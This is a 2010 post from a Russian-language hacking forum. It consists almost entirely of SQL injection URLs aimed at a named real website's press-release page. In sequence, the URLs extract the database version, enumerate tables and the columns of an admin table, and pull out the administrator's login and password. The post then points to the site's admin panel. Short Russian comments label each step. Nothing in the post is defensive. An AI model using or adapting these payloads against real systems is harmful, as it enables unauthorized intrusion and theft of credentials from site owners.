13.12.2010, 22:36
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
indusites.com
http://indusites.com/press/press-release-details.asp?id=141+or+1=@@version (2005 ветка )
http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+(select+top+9+table_name+from+information_sche ma.tables)) (нужная нам таблица)
http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+column_name+ from+information_schema.columns+where+table_name=' tblAdmin'+and+column_name+not+in+(select+top+0+col umn_name+from+information_schema.columns+where+tab le_name='tblAdmin'+group+by+column_name)+group+by+ column_name+for+xml+raw) (перебираем колонки)
http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+quotename(username %2B':'%2Buserpassword)+from+tblAdmin) (логин и пароль админа )
http://indusites.com/admin/ (сама админка)
|
|
|